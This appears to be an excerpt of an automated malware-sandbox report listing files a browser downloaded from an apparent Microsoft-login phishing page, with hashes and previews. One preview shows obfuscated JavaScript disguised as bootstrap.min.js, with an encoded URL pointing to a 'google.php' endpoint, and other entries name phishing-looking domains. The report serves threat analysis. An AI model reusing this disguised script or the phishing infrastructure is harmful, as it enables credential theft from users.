                                                                                  SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                                  SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):196
                                                                                  Entropy (8bit):5.098952451791238
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                                  SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                                  SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                                  SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://mahoganydevelopment.secuefilett.sbs/favicon.ico
                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                  Category:downloaded
                                                                                  Size (bytes):621
                                                                                  Entropy (8bit):7.673946009263606
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):549812
                                                                                  Entropy (8bit):4.912850275119463
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:FC72FFEDFB276F477C38968B088FB0A4
                                                                                  SHA1:B820749E4E0C7CF79B4C5C839ECC652AAA61E819
                                                                                  SHA-256:D900ABF27298A31B3F7207CA0D37FE2664ACDE2571B9B6A836B3D444A69C6EB6
                                                                                  SHA-512:76CF3ED623761C3AA32B9E1D4413075ED403A637424E7BEC0D0D8E55B044074B3D5AFEB487DDEC49268A16EFE784DC438D850E9CEB8A2873F471344FFF201B82
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://7074924506-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.js
                                                                                  Preview:var file = "aHR0cHM6Ly83MDc0OTI0NTA2LnNicy9nb29nbGUucGhw";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef));var count=0x5
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):8777
                                                                                  Entropy (8bit):5.261330074401403
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:A164B9DBEA8400D16D5072C514244DAF
                                                                                  SHA1:C83512061462BF216DD8568C20847CE9111340CE
                                                                                  SHA-256:D5628D654DB5DCFDE7E755F2578F8E615F05BD5A54AD66DCB95B96AC23763607
                                                                                  SHA-512:9F2CEFC4E78B91C4F39DACABD889C45C4DA27C6AE6C7BF3F06172F392164286B58DB00581512C9E09BA678B0F131F884CCE90DA4054E44FE12C07AC62151CDC5
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdn1.cloud-database.co/renderer/css/jquery.fancybox-1.3.4.css
                                                                                  Preview:/*. * FancyBox - jQuery Plugin. * Simple and fancy lightbox alternative. *. * Examples and documentation at: http://fancybox.net. *. * Copyright (c) 2008 - 2010 Janis Skarnelis. * That said, it is hardly a one-person project. Many people have submitted bugs, code, and offered their advice freely. Their support is greatly appreciated.. *. * Version: 1.3.4 (11/11/2010). * Requires: jQuery v1.3+. *. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. */..#fancybox-loading {..position: fixed;..top: 50%;..left: 50%;..width: 40px;..height: 40px;..margin-top: -20px;..margin-left: -20px;..cursor: pointer;..overflow: hidden;..z-index: 1104;..display: none;.}..#fancybox-loading div {..position: absolute;..top: 0;..left: 0;..width: 40px;..height: 480px;..background-image: url('img/fancybox/fancybox.png');.}..#fancybox-overlay {..position: absolute;..top: 0;..left: 0;..width: 100%;..z-index: 1100;..displ
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 23 x 10, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):3.8929244277956476
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:2B72E71666118E0B1A971558D036DAEC
                                                                                  SHA1:A8943D8F7A2AEC55F2FC03C90A528CA9F04DB3E7
                                                                                  SHA-256:CBF96EB9CE7BA21901559DE04878251AB4448ACE1C5D560A2408093C15CCFE39
                                                                                  SHA-512:015ED50A395D8378F8F0FEC4C01645A68FA9D28659F5A955027269223C752948BBDFA1324E70698B7C10CE456C69BA0BA9B6A393DA5385DBA47A7F923B241453
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9271c1802da2187f/1743108583508/yZ3-l4iYq0BMia8
                                                                                  Preview:.PNG........IHDR...............R.....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (2915), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):2915
                                                                                  Entropy (8bit):5.39883458124565
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:33169E53C00259BDF781C63986697C0E
                                                                                  SHA1:9916F7663F55A698AF53DC3DF3D34CC1CBA26276
                                                                                  SHA-256:CB8E9B869EA9735D749FCA9BB1078FE64425EF5DE042008A6F63EF5F27FA015E
                                                                                  SHA-512:27AB22230F2D4DFE298A2CB406EBCBACAC0A485597B95B9F79C26421BAFAD278BE0278456B6455399A87570F923EDD7301479A43D6985AF860A57E80438781E3
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/json2.min.js
                                                                                  Preview:this.JSON||(this.JSON={}),function(){function f(t){return 10>t?"0"+t:t}function quote(t){return escapable.lastIndex=0,escapable.test(t)?'"'+t.replace(escapable,function(t){var e=meta[t];return"string"==typeof e?e:"\\u"+("0000"+t.charCodeAt(0).toString(16)).slice(-4)})+'"':'"'+t+'"'}function str(t,e){var n,r,f,o,u,i=gap,a=e[t];switch(a&&"object"==typeof a&&"function"==typeof a.toJSON&&(a=a.toJSON(t)),"function"==typeof rep&&(a=rep.call(e,t,a)),typeof a){case"string":return quote(a);case"number":return isFinite(a)?String(a):"null";case"boolean":case"null":return String(a);case"object":if(!a)return"null";if(gap+=indent,u=[],"[object Array]"===Object.prototype.toString.apply(a)){for(o=a.length,n=0;o>n;n+=1)u[n]=str(n,a)||"null";return f=0===u.length?"[]":gap?"[\n"+gap+u.join(",\n"+gap)+"\n"+i+"]":"["+u.join(",")+"]",gap=i,f}if(rep&&"object"==typeof rep)for(o=rep.length,n=0;o>n;n+=1)r=rep[n],"string"==typeof r&&(f=str(r,a),f&&u.push(quote(r)+(gap?": ":":")+f));else for(r in a)Object.hasOwnP
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32065)
                                                                                  Category:downloaded
                                                                                  Size (bytes):85578
                                                                                  Entropy (8bit):5.366055229017455
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (23557)
                                                                                  Category:downloaded
                                                                                  Size (bytes):23723
                                                                                  Entropy (8bit):4.756159841457858
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:0C502DA3AD89A0D8AD90821AE9661456
                                                                                  SHA1:BC55258127FB43314319C85B6FC771341213BD47
                                                                                  SHA-256:0F0E3BD22ADD59AB659FEB82B914D37E32A5861A44F1F93AF843822693DD2891
                                                                                  SHA-512:6E1EEF5C6C1D537F143A052C9BA387B2064DF51ACF46C02A4F57CA5C15539BBCB83C303041CE48B369A77616BCF88F8F49D98FBF6FA4C2C5B1C8E9DC14A3A3D7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdn1.cloud-database.co/renderer/css/fonts.css
                                                                                  Preview:/*!. * Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */. @font-face{font-family:'FontAwesome';src:url('fonts/fontawesome-webfont.eot?v=4.3.0');src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.3.0') format('embedded-opentype'),url('fonts/fontawesome-webfont.woff2?v=4.3.0') format('woff2'),url('fonts/fontawesome-webfont.woff?v=4.3.0') format('woff'),url('fonts/fontawesome-webfont.ttf?v=4.3.0') format('truetype'),url('fonts/fontawesome-webfont.svg?v=4.3.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;transform:translate(0, 0)}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-f
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                  Category:dropped
                                                                                  Size (bytes):17174
                                                                                  Entropy (8bit):2.9129715116732746
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (19015)
                                                                                  Category:downloaded
                                                                                  Size (bytes):19188
                                                                                  Entropy (8bit):5.212814407014048
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (50758)
                                                                                  Category:downloaded
                                                                                  Size (bytes):51039
                                                                                  Entropy (8bit):5.247253437401007
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):3.990210155325004
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):1462
                                                                                  Entropy (8bit):4.921076940400464
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:F74B636868BEF99C53B2C7D76C129789
                                                                                  SHA1:3225AE21C3F476342F6B42538645A989DAF462D7
                                                                                  SHA-256:80B81ED512419012545C560F249D8008C3433284EFBE260669477B6712F58180
                                                                                  SHA-512:2030A45B4FBE0E1AEE203797E53CDC91A13C0D975C4B39BD2CF8A807462FC80CC2396110000485BE8B8F026FA81100D2E21D61DFA384A413FB150F9A6089E9EC
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdn1.cloud-database.co/renderer/css/v2/themes/theme-kn-beta_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.min.css
                                                                                  Preview:@keyframes spinAround {. from {. transform: rotate(0deg);. }. to {. transform: rotate(359deg);. }.}..kn-content .is-bold {. font-weight: bold !important;.}..kn-content .is-italic {. font-style: italic !important;.}..kn-content .is-strong {. font-weight: bold !important;.}..#knack-logo a {. color: white;.}...kn-navigation-bar a:hover {. background-color: rgba(0, 0, 0, 0.1);.}..@media screen and (min-width: 769px) {. .kn-dropdown-menu ul {. box-shadow: 0 0 20px 10px rgba(0, 0, 0, 0.1);. }. .kn-dropdown-menu ul a {. color: rgba(0, 0, 0, 0.8);. }. .kn-dropdown-menu li {. background-color: white;. }.}..kn-menu-arrow.is-right:before {. background: linear-gradient(to right, rgba(255, 255, 255, 0), #023F74);.}...kn-menu-arrow.is-left:before {. background: linear-gradient(to left, rgba(255, 255, 255, 0), #023F74);.}...kn-content a {. text-decoration: underline;.}...kn-table th a,..control a {. text-decoration: none;.}...kn-info-bar {. background-color: rgba(0,
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (655)
                                                                                  Category:downloaded
                                                                                  Size (bytes):312997
                                                                                  Entropy (8bit):5.247634500376613
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:C74FF856727353392F41E0CD7B47C000
                                                                                  SHA1:E2C56FD5956B19C57A0EB905571553B4E4645B50
                                                                                  SHA-256:AF6FCCF308254DF870505A3371FD5ADB23EC1BD68BE5FD767F77549FB32DE3DF
                                                                                  SHA-512:C26909DCB6F504C0B24FF76AF5D53D963F3DF8F81AA2F7C87F062802E6558FA73F54785F24285FD83BEF0B8EC894553B747CDBC147E312F1BCFB39636B04F0F1
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdn1.cloud-database.co/renderer/css/v2/renderer_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.v2.min.css
                                                                                  Preview:@keyframes spinAround {. from {. transform: rotate(0deg);. }. to {. transform: rotate(359deg);. }.}..kn-content .is-bold {. font-weight: bold !important;.}..kn-content .is-italic {. font-style: italic !important;.}..kn-content .is-strong {. font-weight: bold !important;.}...input, .chzn-container-multi .chzn-choices .search-field input, .chzn-container-multi .chzn-choices, .chzn-container-single .chzn-single,..kn-textarea {. -moz-appearance: none;. -webkit-appearance: none;. align-items: center;. background-color: white;. border: 1px solid hsl(0, 0%, 86%);. border-radius: 0.35em;. color: hsl(0, 0%, 21%);. display: inline-flex;. font-size: 14px;. height: 32px;. justify-content: flex-start;. line-height: 24px;. padding-left: 8px;. padding-right: 8px;. position: relative;. vertical-align: top;. box-shadow: inset 0 1px 2px rgba(10, 10, 10, 0.1);. max-width: 100%;. width: 100%;.}..input:hover, .chzn-container-multi .chzn-choices .search-field input:hover, .ch
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):32
                                                                                  Entropy (8bit):4.390319531114783
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                                  SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                                  SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                                  SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCcBCRNkwdg-dEgUNrQmusSH7_HTLjJTHwRIZCewzVfMe3aJ8EgUNQ_N2OSFGfRHYj63ivw==?alt=proto
                                                                                  Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):21873
                                                                                  Entropy (8bit):2.877142515573533
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                                                  SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                                                  SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                                                  SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (48122)
                                                                                  Category:downloaded
                                                                                  Size (bytes):48123
                                                                                  Entropy (8bit):5.342998089666478
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:EA38BDA3C117E2FE01BD862003357394
                                                                                  SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                                                  SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                                                  SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
